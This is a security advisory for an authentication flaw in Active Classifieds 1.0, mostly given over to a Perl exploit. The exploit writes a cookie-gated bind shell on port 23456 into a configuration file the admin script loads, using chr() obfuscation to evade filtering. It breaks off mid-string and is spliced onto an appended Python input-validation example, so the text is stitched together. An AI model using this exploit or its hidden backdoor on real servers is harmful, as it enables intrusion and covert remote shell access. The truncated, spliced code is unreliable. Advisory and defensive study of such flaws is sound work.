Active Classifieds Arbitrary Code Execution Vulnerability
2008-04-09 04:31:20 Source: Internet
Published: 2001-06-28
Updated: 2001-07-03
Affected systems:
Active Web Suite Technologies Active Classifieds Free Edition 1.0
Description:
BUGTRAQ ID: 2942
CVE(CAN) ID: CAN-2001-1290
Active Classifieds is an online classified-ad listing and management system.
Its free edition contains an authentication flaw that allows a remote user to execute administrative commands without authenticating. As a result, an attacker may execute arbitrary code on the host running this software.
<*Source: Igor Dobrovitski (noident@my-deja.com)*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching only. Users bear the risk themselves!
Igor Dobrovitski (noident@my-deja.com) provided the following test code:
#!/usr/bin/perl -w
# exploit by Igor Dobrovitski noident@my-deja.com
# This exploit will spawn an interactive shell on port 23456
# A configuration file that is added to the admin.cgi at runtime through 'require' statement
# can be ovewritten. We can write to that file, but can't read it, so we simply restore
# the default settings. If the administrator made changes to the file
# 'websites/default/variables/design.pl', those changes will be lost and defaults restored.
# Our shell code is also written to that file, but will only be executed if the password
# cookie is supplied. Whoever else invokes the script won't trigger the shell.
# Enjoy
use Socket;
$| = 1;
####################################################################################################
$password = 'noident'; # Our cookie password, change it if you want, don't set to empty string
# Some metacharacters, like quotes and '&' are filtered so the code looks a bit weird
$exec_code = 'use Socket;$shell = (chr 47) . bin . (chr 47) . sh . (chr 32) . (chr 45) . (chr 105);socket(SOCK, PF_INET, SOCK_STREAM, 6);setsockopt(SOCK, SOL_SOCKET, SO_REUSEADDR, 1);$port=23456;bind(SOCK, sockaddr_in($port, INADDR_ANY));listen(SOCK, 1);accept (NEW, SOCK);if(!fork()){open STDIN, (chr 60) . (chr 38) . NEW; open STDOUT, (chr 62) . (chr 38) . NEW;open STDERR, (chr 62) . (chr 38) . NEW;exec $shell}else{close NEW;exit;}';
####################################################################################################
unless(defined $ARGV[0]) {die "Usage: $0 www.example.com/cgi-bin/blah/classifieds/admin.cgi\n"}
$ARGV[0] =~ s|^(?:http://)*||;
($host, $scriptpath) = $ARGV[0] =~ m|^(.*?)(/.*)$|;
my $form = makeform({
'request' => 'submit_edit_design_variables',
'bgcolor' => '#FFFFFF',
'text' => '#000000',
'link' => 'navy',
'vlink' => '#aaaaaa',
'alink' => '#FFCC00',
'marginheight' => '0',
'marginwidth' => '0',
'topmargin' => '0',
'leftmargin' => '0',
'background' => '',
'table_width' => "600';\nif(\$ENV{HTTP_COOKIE} eq \'$password\'){$exec_code}\n\$blah = '",
'header_row_color' => '#666666',
'mouse_over_color' => '#DDDDDD',
'line_color' => '#C0C0C0',
'alternate_row_color' => '#EEEEEE',
'inverse_font_color' => '#FFFFFF',
'alternate_font_color' => '#666666',
'font_face' => 'arial, helvetica',
'small_font_size' => '1',
'standard_font_size' => '2',
'large_font_size' => '3',
'max_records_per_page' => '20',
'allow_show_all' => 'yes',
'display_ad_count' => 'yes',
'display_icons' => 'yes',
'display_ad_totals' => 'yes',
'display_ad_postdate' => 'yes',
'display_location' => 'yes',
'date_format' => '3',
'months' => 'January\nFebruary\nMarch\nApril\nMay\nJune\nJuly\nAugust\nSeptember\nOctober\nNovember\nDecember',
'shortmonths' => 'Jan\nFeb\nMar\nApr\nMay\nJun\nJul\nAug\nSept\nOct\nNov\nDec',
'weekdays' => 'Sunday\nMonday\nTuesday\nWednesday\nThursday\nFriday\nSaturday',
'years' => '2000\n2001\n2002\n2003\n2004',
'states' => 'Alabama\nAlaska\nArizona\nArkansas\nCalifornia\nColorado\nConnecticut\nDistrict of Columbia\nDelaware\nFlorida\nGeorgia\nGuam\nHawaii\nIdaho\nIllinois\nIndiana\nIowa\nKansas\nKentucky\nLouisiana\nMaine\nMaryland\nMassachusetts\nMichigan\nMinnesota\nMississippi\nMissouri\nMontana\nNebraska\nNevada\nNew Hampshire\nNew Jersey\nNew Mexico\nNew York\nNorth Carolina\nNorth Dakota\nOhio\nOklahoma\nOregon\nPennsylvania\nPuerto Rico\nRhode Island\nSouth Carolina\nSouth Dakota\nTennessee\nTexas\nUtah\nVermont\nVirginia\nWashington\nWest Virginia\nWisconsin\nWyoming\n-------------------------\nCanada - Alberta\nCanada - British Columbia\nCanada - Manitoba\nCanada - New
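The root cause described in the exploit's comments is that form values are written verbatim into a Perl file that admin.cgi later loads with 'require', with only a blacklist of metacharacters in the way. The Python example below is added here and is not part of the advisory or of Active Classifieds: it validates each design variable against an allowlist pattern and stores the result as JSON data rather than as Perl source. The field names are those of the exploit's form; the patterns and the helper names are assumptions for illustration.

```python
import json
import re

# Allowlist patterns for the design-variable fields the advisory's form submits.
# The patterns are assumptions for this example; admin.cgi itself is not reproduced.
COLOR = r'#[0-9A-Fa-f]{3,6}|[A-Za-z]{1,20}'        # '#FFFFFF' or 'navy'
INT = r'\d{1,4}'
YESNO = r'yes|no'
LINES = r'[A-Za-z0-9 \-]{1,40}(?:\n[A-Za-z0-9 \-]{1,40}){0,80}'  # newline lists
FIELD_RULES = {
    'bgcolor': COLOR, 'text': COLOR, 'link': COLOR, 'vlink': COLOR, 'alink': COLOR,
    'header_row_color': COLOR, 'mouse_over_color': COLOR, 'line_color': COLOR,
    'alternate_row_color': COLOR, 'inverse_font_color': COLOR,
    'alternate_font_color': COLOR, 'marginheight': INT, 'marginwidth': INT,
    'topmargin': INT, 'leftmargin': INT, 'max_records_per_page': INT,
    'table_width': r'\d{1,4}%?', 'small_font_size': r'[1-7]',
    'standard_font_size': r'[1-7]', 'large_font_size': r'[1-7]',
    'date_format': r'[1-9]', 'font_face': r'[A-Za-z0-9 ,\-]{1,64}',
    'background': r'[A-Za-z0-9_./\-]{0,128}', 'allow_show_all': YESNO,
    'display_ad_count': YESNO, 'display_icons': YESNO, 'display_ad_totals': YESNO,
    'display_ad_postdate': YESNO, 'display_location': YESNO, 'months': LINES,
    'shortmonths': LINES, 'weekdays': LINES, 'years': LINES, 'states': LINES,
}

class ConfigValidationError(ValueError):
    pass

def validate_design_variables(form):
    """Return only known fields whose values fully match their pattern. An unknown
    field, or a value with any character outside the allowlist (quotes, ';', '$',
    '{' ...), aborts the whole save instead of being silently filtered."""
    clean = {}
    for name, value in form.items():
        pattern = FIELD_RULES.get(name)
        if pattern is None:
            raise ConfigValidationError(f'unknown field: {name}')
        if not isinstance(value, str) or not re.fullmatch(pattern, value):
            raise ConfigValidationError(f'rejected value for {name}')
        clean[name] = value
    return clean

def serialize_design_variables(form):
    """Persist validated settings as JSON data, never as Perl source to be require'd."""
    return json.dumps(validate_design_variables(form), sort_keys=True)

def is_accepted(form):
    try:
        validate_design_variables(form)
        return True
    except ConfigValidationError:
        return False
```

The 'request' dispatch field is expected to be stripped by the caller before validation, and this check only complements, never replaces, an authentication check on the admin script, whose absence is the advisory's primary issue.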
